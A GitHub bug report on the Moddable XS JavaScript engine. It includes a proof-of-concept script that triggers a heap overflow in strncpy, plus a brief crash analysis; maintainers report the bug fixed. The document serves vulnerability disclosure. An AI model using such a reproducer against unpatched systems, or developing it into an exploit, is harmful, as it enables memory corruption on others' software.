Moddable-OpenSource/moddable #377: heap overflow

rain6851, 2020-06-02:
# Enviroment
```
operating system: ubuntu18.04
compile command:  cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
```
# poc:
```
try {
    var aString = new String('^cro[T5?s)^hz+@&|oxA9v');
    var GQkM = aString.startsWith(aString, aString.length);
    var mJGG = aString.repeat(aString.length);
    aString = JSON.stringify('DL&;|kRkX{;R^jHh');
    var DEQr = new ArrayBuffer(null);
    var cErp = aString.toUpperCase();
    var kFzn = aString.match(mJGG, mJGG);
    var AxPG = aString.includes(aString);
    AxPG = AxPG.valueOf();
    var GYFS = aString.st();
    if (aString.search(/String/i) !== 5) {
        estFailed('{DPk.!k' + aString.search(/String/i));
    }
} catch (ex) {
    sputnikException = ex;
    var pGcJ = JSON.stringify('[<');
    var ezcN = JSON.stringify('@@&#8WqzuR&}uL61%@?(3oN3');
}
var successfullyParsed = true;
var cbRa = new ArrayBuffer(null);
var TFGn = JSON.stringify('4^iq`');
var ZdRA = new SharedArrayBuffer(null);
```
# vulnerability analysis
```
crash position: __strncpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S:1672
```
We can see that there is an error in continuously copying the data of `xmm0` to the memory area pointed to by `rdi+0x30`. And through the vmmp command, we found that `rdi+0x30` points to the heap area.

[image]

[image]

rain6851, 2020-06-02:
@phoddie @mkellner @Moddable-OpenSource please check the issue

phoddie, 2020-08-05:
Fixed with latest commit

closed 2020-09-03 by phoddie